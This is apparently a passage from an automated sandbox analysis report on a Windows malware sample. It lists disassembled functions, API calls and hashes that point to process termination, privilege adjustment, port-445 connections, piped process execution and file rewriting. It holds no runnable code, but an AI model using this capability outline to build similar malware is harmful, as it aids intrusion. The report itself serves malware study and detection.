      control_flow_graph 640 ca3a18-ca3a4c RegOpenKeyExW 641 ca3a4e-ca3a68 RegQueryValueExW 640->641 642 ca3a7f-ca3a85 640->642 643 ca3a6a-ca3a6f 641->643 644 ca3a86-ca3a91 641->644 643->644 645 ca3a71-ca3a74 643->645 646 ca3a76-ca3a79 RegCloseKey 644->646 645->646 646->642
      APIs
      • RegOpenKeyExW.KERNELBASE(00000002,00000000,00000000,00020119,00000000,00000000,00000000,80000002,00000000,00000002,?), ref: 00CA3A44
      • RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,?), ref: 00CA3A60
      • RegCloseKey.KERNELBASE(?), ref: 00CA3A79
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CloseOpenQueryValue
      • String ID:
      • API String ID: 3677997916-0
      • Opcode ID: 22a826c65a280ec82804fdf00c72e00240d09d3bf51fa0039be14288575995db
      • Instruction ID: a38200b811c682d298885fb3fff68888030efc8e0264efa8244693f39f66e598
      • Opcode Fuzzy Hash: 22a826c65a280ec82804fdf00c72e00240d09d3bf51fa0039be14288575995db
      • Instruction Fuzzy Hash: 1511B3B190024EAFDB11CF99D8849AEBBB8FB49348B10446AE955E2120D7309F55EB51
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      control_flow_graph 647 ca239a-ca23b7 call ca3e39 call ca3955 652 ca23ba-ca23c4 call ca5962 647->652 655 ca23d2-ca23e5 call ca4f7a 652->655 656 ca23c6-ca23d0 call ca5962 652->656 662 ca240b-ca2416 Sleep 655->662 663 ca23e7-ca23ea 655->663 656->655 661 ca2418-ca242c call ca3955 656->661 662->652 664 ca23ec-ca23ef 663->664 665 ca23f1 663->665 667 ca23f4-ca2405 EnterCriticalSection LeaveCriticalSection 664->667 665->667 667->662
      APIs
        • Part of subcall function 00CA3E39: GetVersion.KERNEL32(?,00CA2B0D), ref: 00CA3E42
        • Part of subcall function 00CA5962: EnterCriticalSection.KERNEL32(?,00000000,00000000,00CA2E54), ref: 00CA596A
        • Part of subcall function 00CA5962: LeaveCriticalSection.KERNEL32(?), ref: 00CA5973
      • EnterCriticalSection.KERNEL32(00000004), ref: 00CA23F8
      • LeaveCriticalSection.KERNEL32(00000004), ref: 00CA2405
      • Sleep.KERNELBASE(000003E8), ref: 00CA2410
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSection$EnterLeave$SleepVersion
      • String ID:
      • API String ID: 3495237732-0
      • Opcode ID: 5a688b708eab981be5f6b8434dbc36e987ce89d2e2a7cee8ed6520fa5bdbfab6
      • Instruction ID: a433f2700f55632a8d6343877affd23fd4c5832920a66d97c411cdc2d791bb11
      • Opcode Fuzzy Hash: 5a688b708eab981be5f6b8434dbc36e987ce89d2e2a7cee8ed6520fa5bdbfab6
      • Instruction Fuzzy Hash: 4E01C472500213EBDB109BA5DC05B5EB768BB43358F104025F6069B1A1D774EE54E7A1
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      control_flow_graph 669 ca4f7a-ca4f90 call ca4ea5 672 ca4f92-ca4f9e ReleaseMutex CloseHandle 669->672 673 ca4fa4-ca4fa8 669->673 672->673
      APIs
        • Part of subcall function 00CA4EA5: OpenMutexW.KERNEL32(00100000,00000000,00000000,?,?,00000000,00000000), ref: 00CA4F1E
        • Part of subcall function 00CA4EA5: CreateMutexW.KERNELBASE(00000000,00000000,00000000,?,?,00000000,00000000), ref: 00CA4F2D
        • Part of subcall function 00CA4EA5: WaitForSingleObject.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 00CA4F3C
        • Part of subcall function 00CA4EA5: CloseHandle.KERNEL32(00000000,?,?,00000000,00000000), ref: 00CA4F56
      • ReleaseMutex.KERNEL32(?,?,00000000,00000000,?,00CA2C6F,00000001), ref: 00CA4F95
      • CloseHandle.KERNEL32(?,?,00CA2C6F,00000001), ref: 00CA4F9E
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Mutex$CloseHandle$CreateObjectOpenReleaseSingleWait
      • String ID:
      • API String ID: 2599181272-0
      • Opcode ID: ab05b54bc0b264117b3f34383586815d57e139a276d0c7b9e63c5d29afd170e9
      • Instruction ID: a24696d9b33ae03e19e268bbc360c916dd45136d567c9df19000f0047bc696ff
      • Opcode Fuzzy Hash: ab05b54bc0b264117b3f34383586815d57e139a276d0c7b9e63c5d29afd170e9
      • Instruction Fuzzy Hash: FCD0127290012DFFDF155B94DC0A99EBB38EF427697100160F90163120D7719F14E7D0
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • RegSetValueExW.KERNELBASE(?,00000000,00000000,00000001,00CA1408,?,00000104,?,00CA1408,00000000,00000000), ref: 00CA3AA6
      • RegCloseKey.ADVAPI32(?,?,00CA1408,00000000,00000000), ref: 00CA3AB2
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CloseValue
      • String ID:
      • API String ID: 3132538880-0
      • Opcode ID: 526798ab0c53c218020ea8c3bb9ce01317e63d4cd570e615531a5e3be3c3e35b
      • Instruction ID: 3bf61f5f252dc54b054aa125c02bc4f5ea1eb988c36acb970b6280ecd085ab35
      • Opcode Fuzzy Hash: 526798ab0c53c218020ea8c3bb9ce01317e63d4cd570e615531a5e3be3c3e35b
      • Instruction Fuzzy Hash: 24D05E3618011AFFDF225FA4DC05FEABB6AEF09715F004020FA0A860B0D7739524EB91
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
      • RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Heap$AllocateProcess
      • String ID:
      • API String ID: 1357844191-0
      • Opcode ID: 97e4e6fab78de6740c75d12757d62db5537030e458b379646d226bcaadf8ea1e
      • Instruction ID: cd64f9d0bd827d124fa738c590ebc11970936f9cce0810698302f5c57263baa3
      • Opcode Fuzzy Hash: 97e4e6fab78de6740c75d12757d62db5537030e458b379646d226bcaadf8ea1e
      • Instruction Fuzzy Hash: E8C048B0704201BFEE509BA99E09B2E36ACEB86B4AF100444FA5BC6050D7388800CA22
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00CA29F5: GetTickCount.KERNEL32 ref: 00CA2A94
        • Part of subcall function 00CA29F5: GetLocaleInfoW.KERNEL32(00000800,00000058,?,00000020), ref: 00CA2AB4
      • ExitProcess.KERNEL32 ref: 00CA2FAE
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CountExitInfoLocaleProcessTick
      • String ID:
      • API String ID: 1528680899-0
      • Opcode ID: ea02e0e1408bf37a5033100b67f4fe650eda311a04e4961808d8c4554c1fb90e
      • Instruction ID: d18c215bffee67ff7b4cabf31d1487dab16616933bb5676a97d5d08329351702
      • Opcode Fuzzy Hash: ea02e0e1408bf37a5033100b67f4fe650eda311a04e4961808d8c4554c1fb90e
      • Instruction Fuzzy Hash: 0590022114411296E1912774590E74D35105707B0EF014100B106550A15E900000A522
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00CA9041: GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
        • Part of subcall function 00CA9041: RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
      • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,?,?,?,00CA28D8,00000000,00000000,00000000), ref: 00CA3B81
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Heap$AllocateEnvironmentExpandProcessStrings
      • String ID:
      • API String ID: 2571445646-0
      • Opcode ID: 103b71570e5b766bbe0aca873ee826d97c600345444293e2dbf6159d1f524e77
      • Instruction ID: 9e65f5ff8f6956d4803429eee1fc177c503a9a9d3924f90536d6bebf170eb292
      • Opcode Fuzzy Hash: 103b71570e5b766bbe0aca873ee826d97c600345444293e2dbf6159d1f524e77
      • Instruction Fuzzy Hash: 1801F033500245BBDF216BA5EC4BD5F7E6ADFC63A4B204025F50597150D9718F01A770
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00CA28D8,00000000,00000000), ref: 00CA3CA2
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: InformationVolume
      • String ID:
      • API String ID: 2039140958-0
      • Opcode ID: 2c5e746b3fe39248d183ecba902a3173f153f86771c8583d30fae1e94c36153b
      • Instruction ID: fc96038c8d84b9330d2656ebc0441f62c47583e32445d0a022aa8daa7afd7aeb
      • Opcode Fuzzy Hash: 2c5e746b3fe39248d183ecba902a3173f153f86771c8583d30fae1e94c36153b
      • Instruction Fuzzy Hash: BEE06572501129BEA620AB529D4ADFF7F7CDE83AB8B10005AF80497140EA706F01E6F1
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00CA9041: GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
        • Part of subcall function 00CA9041: RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
      • CreateThread.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000), ref: 00CA24F8
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Heap$AllocateCreateProcessThread
      • String ID:
      • API String ID: 2224927103-0
      • Opcode ID: e5df67151b92ab6503844a133f4f617648d4fd8486665fa86aef4d3e4701554f
      • Instruction ID: beb444d948b066d4bbd1d55951ba89d9f8c9c11daacd7ed981e62c709a90514f
      • Opcode Fuzzy Hash: e5df67151b92ab6503844a133f4f617648d4fd8486665fa86aef4d3e4701554f
      • Instruction Fuzzy Hash: 75F01CB1514209AFCB08CF55E885C5BBBE9FF88310B14C669F90D8B221D330D8518BA0
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00CA3DC0: GetCurrentProcess.KERNEL32(00000020,00CA232B,00000000,?,?,?,?,?,?,?,?,00CA232B,00000000), ref: 00CA3DD5
        • Part of subcall function 00CA3DC0: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,00CA232B,00000000), ref: 00CA3DDC
        • Part of subcall function 00CA3DC0: LookupPrivilegeValueW.ADVAPI32(00000000,00CA232B,?), ref: 00CA3DEE
        • Part of subcall function 00CA3DC0: AdjustTokenPrivileges.KERNELBASE(00CA232B,00000000,?,00000000,00000000,00000000), ref: 00CA3E1D
        • Part of subcall function 00CA3DC0: FindCloseChangeNotification.KERNELBASE(00CA232B,?,?,?,?,?,?,?,00CA232B,00000000), ref: 00CA3E2D
        • Part of subcall function 00CA4DEE: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CA4E00
        • Part of subcall function 00CA4DEE: Process32FirstW.KERNEL32(00CA2351,?), ref: 00CA4E38
        • Part of subcall function 00CA4DEE: OpenProcess.KERNEL32(00000001,00000000,?,00000000,?,?,?), ref: 00CA4E68
        • Part of subcall function 00CA4DEE: TerminateProcess.KERNEL32(00000000,00000000,?,?,?), ref: 00CA4E76
        • Part of subcall function 00CA4DEE: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00CA4E7F
        • Part of subcall function 00CA4DEE: Process32NextW.KERNEL32(00CA2351,?), ref: 00CA4E8E
        • Part of subcall function 00CA4DEE: FindCloseChangeNotification.KERNELBASE(00CA2351,?,?,?), ref: 00CA4E9C
      • Sleep.KERNELBASE(?), ref: 00CA2358
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Process$Close$ChangeFindNotificationOpenProcess32Token$AdjustCreateCurrentFirstHandleLookupNextPrivilegePrivilegesSleepSnapshotTerminateToolhelp32Value
      • String ID:
      • API String ID: 1099845645-0
      • Opcode ID: 9a8e6ffeb62a49701ef02131e8499f1e6c08631a7790716be089aa37192f717e
      • Instruction ID: 188db62d4492574a38619439666c56fa9d089c29ba015ce632982b18212c00b2
      • Opcode Fuzzy Hash: 9a8e6ffeb62a49701ef02131e8499f1e6c08631a7790716be089aa37192f717e
      • Instruction Fuzzy Hash: B311947290020ABFEF11BBB4DC83EAFB76CDF03398F14406AF10456092DA759F81A661
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • htons.WS2_32(000001BD), ref: 00CA5085
        • Part of subcall function 00CA905B: GetProcessHeap.KERNEL32(00000008,00000000,00CA92F9,00000001,00000002,00000000,00000000,00CA3BCD,00000000,00000000,00000000,00000000,?,?,?,00CA3C8D), ref: 00CA906C
        • Part of subcall function 00CA905B: HeapAlloc.KERNEL32(00000000,?,00CA3C8D,00000017,00000000,00000000,?,?,?,00CA28D8,00000000,00000000,00000000), ref: 00CA9073
      • htonl.WS2_32(00000000), ref: 00CA50DB
      • socket.WS2_32(00000002,00000001,00000006), ref: 00CA50EC
      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00CA5102
      • connect.WS2_32(00000000,?,00000010), ref: 00CA5113
      • WSAGetLastError.WS2_32 ref: 00CA511D
      • getsockopt.WS2_32(?,0000FFFF,00001007,?,?), ref: 00CA517C
      • recv.WS2_32(?,?,00000001,00000002), ref: 00CA5195
      • WSAGetLastError.WS2_32 ref: 00CA51A2
      • getpeername.WS2_32(?,?,?), ref: 00CA51C9
      • closesocket.WS2_32(?), ref: 00CA51E3
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: ErrorHeapLast$AllocProcessclosesocketconnectgetpeernamegetsockopthtonlhtonsioctlsocketrecvsocket
      • String ID: 3'
      • API String ID: 1659685214-280543908
      • Opcode ID: 1eb27ae4c75d3899bf9031ac2a73f6f1c675865f8e9f472cd569ea3ef9b49364
      • Instruction ID: 0313593124699d64b8a861200b96c8c4f45667884207209b9d9c09ce6ef8c73c
      • Opcode Fuzzy Hash: 1eb27ae4c75d3899bf9031ac2a73f6f1c675865f8e9f472cd569ea3ef9b49364
      • Instruction Fuzzy Hash: DF514C71E0060AFFDF219FA4D885BEEBBB4EF0A319F104129EA51B7150D7719A41CB91
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • InitializeCriticalSectionAndSpinCount.KERNEL32(00CAD6A0,00000FA0,00000000,00000000,?,00CA78B7,00000000,00000000,00000000,?,00CA17C2,?), ref: 00CA77F2
      • EnterCriticalSection.KERNEL32(00CAD6A0,?,00CA78B7,00000000,00000000,00000000,?,00CA17C2,?), ref: 00CA77F9
      • QueryPerformanceCounter.KERNEL32(00CA17C2,?,00CA78B7,00000000,00000000,00000000,?,00CA17C2,?), ref: 00CA7809
      • GetTickCount.KERNEL32 ref: 00CA780B
      • GetCurrentProcessId.KERNEL32(?,00CA78B7,00000000,00000000,00000000,?,00CA17C2,?), ref: 00CA7829
      • GetCurrentThreadId.KERNEL32 ref: 00CA7835
      • GetLocalTime.KERNEL32(?,?,00CA78B7,00000000,00000000,00000000,?,00CA17C2,?), ref: 00CA7845
      • SystemTimeToFileTime.KERNEL32(?,00000000,?,00CA78B7,00000000,00000000,00000000,?,00CA17C2,?), ref: 00CA7853
      • QueryPerformanceCounter.KERNEL32(00CA17C2,?,00CA78B7,00000000,00000000,00000000,?,00CA17C2,?), ref: 00CA786F
      • LeaveCriticalSection.KERNEL32(00CAD6A0,?,00CA78B7,00000000,00000000,00000000,?,00CA17C2,?), ref: 00CA7899
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Similarity
      • API ID: CriticalSectionTime$CountCounterCurrentPerformanceQuery$EnterFileInitializeLeaveLocalProcessSpinSystemThreadTick
      • String ID:
      • API String ID: 1260023459-0
      APIs
      • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000000), ref: 00CA444F
      • OpenProcessToken.ADVAPI32(00000000), ref: 00CA4456
      • GetTokenInformation.ADVAPI32(?,00000002,00000000,00CA497D,00CA497D,00000000), ref: 00CA4478
        • Part of subcall function 00CA9041: GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
        • Part of subcall function 00CA9041: RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
      • GetTokenInformation.ADVAPI32(?,00000002,00000000,00CA497D,00CA497D), ref: 00CA4492
      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00CA44B3
      • EqualSid.ADVAPI32(?,?), ref: 00CA44D1
      • LookupAccountSidW.ADVAPI32(00000000,?,?,00CA497D,?,00CA497D,?), ref: 00CA450C
      • GetLastError.KERNEL32 ref: 00CA4516
      • FreeSid.ADVAPI32(?), ref: 00CA4533
      Similarity
      • API ID: ProcessToken$AllocateHeapInformation$AccountCurrentEqualErrorFreeInitializeLastLookupOpen
      • String ID:
      • API String ID: 2524414099-0
      APIs
        • Part of subcall function 00CA9041: GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
        • Part of subcall function 00CA9041: RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
      • FindFirstFileW.KERNEL32(00000000,?,?,00000000,-00000002,00000002), ref: 00CA5DC6
      • FindNextFileW.KERNEL32(00000000,?,?,00000000,-00000002,00000002), ref: 00CA5E9C
      • FindClose.KERNEL32(00000000,?,00000000,-00000002,00000002), ref: 00CA5EAD
      Similarity
      • API ID: Find$FileHeap$AllocateCloseFirstNextProcess
      • String ID: .$.
      • API String ID: 2373226758-3769392785
      APIs
        • Part of subcall function 00CA3D4B: GetModuleHandleA.KERNEL32(00000000,?,00000000,00000000,00CA48E0,?), ref: 00CA3D8C
        • Part of subcall function 00CA3D4B: GetProcAddress.KERNEL32(00000000,00000001), ref: 00CA3DA1
      • CreatePipe.KERNEL32(?,?,?,00000000), ref: 00CA4C1D
      • CreatePipe.KERNEL32(?,?,?,00000000), ref: 00CA4C37
      • SetHandleInformation.KERNEL32(?,00000001,00000000), ref: 00CA4C4D
      • SetHandleInformation.KERNEL32(?,00000001,00000000), ref: 00CA4C5D
      • CreateProcessW.KERNEL32 ref: 00CA4CB3
      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00CA4CD4
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CA4CE0
      • CloseHandle.KERNEL32(?), ref: 00CA4D07
      • CloseHandle.KERNEL32(?), ref: 00CA4D13
      • CloseHandle.KERNEL32(?), ref: 00CA4D22
      • CloseHandle.KERNEL32(?), ref: 00CA4D2E
      • CloseHandle.KERNEL32(?), ref: 00CA4D3A
      • CloseHandle.KERNEL32(?), ref: 00CA4D46
      Similarity
      • API ID: Handle$Close$Create$InformationPipe$AddressFileModuleObjectProcProcessSingleWaitWrite
      • String ID: D
      • API String ID: 4141597255-2746444292
      APIs
      • GetModuleHandleA.KERNEL32(00000000,00000001,74DF35B0,00000208,00000000), ref: 00CA3F86
      • GetProcAddress.KERNEL32(00000000), ref: 00CA3F8F
      • GetModuleHandleA.KERNEL32(00000000,?), ref: 00CA3F98
      • GetProcAddress.KERNEL32(00000000), ref: 00CA3F9B
      • GetModuleHandleA.KERNEL32(00000000,?), ref: 00CA3FA4
      • GetProcAddress.KERNEL32(00000000), ref: 00CA3FA7
      • GetModuleHandleA.KERNEL32(00000000,?), ref: 00CA3FB0
      • GetProcAddress.KERNEL32(00000000), ref: 00CA3FB3
      • GetCurrentProcessId.KERNEL32 ref: 00CA3FE6
      • OpenProcess.KERNEL32(00000438,00000000,00000000), ref: 00CA3FF3
      • ReadProcessMemory.KERNEL32(00000000,?,?,00000020,00000000), ref: 00CA402C
      • ReadProcessMemory.KERNEL32(000000FF,?,?,00000030,00000000), ref: 00CA4046
      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00CA407D
      • ReadProcessMemory.KERNEL32(000000FF,?,?,00000004,00000000), ref: 00CA409A
      • ReadProcessMemory.KERNEL32(000000FF,?,?,?,00000000), ref: 00CA40B6
      • CloseHandle.KERNEL32(000000FF), ref: 00CA4104
      Similarity
      • API ID: Process$HandleModule$AddressMemoryProcRead$CloseCurrentFileNameOpen
      • String ID:
      • API String ID: 754965762-0
      APIs
      • GetFileAttributesW.KERNEL32(?), ref: 00CA87F3
      • GetFileAttributesW.KERNEL32(?), ref: 00CA8816
      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00CA8835
      • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002), ref: 00CA885C
      • SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00CA888C
      • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000001,?,00000000), ref: 00CA88AD
      • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 00CA8938
      • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00CA8966
      • WriteFile.KERNEL32(00000002,00000000,?,?,00000000), ref: 00CA8A62
      • FlushFileBuffers.KERNEL32(F0A75E12), ref: 00CA8A95
      • FlushFileBuffers.KERNEL32(00000002), ref: 00CA8A9A
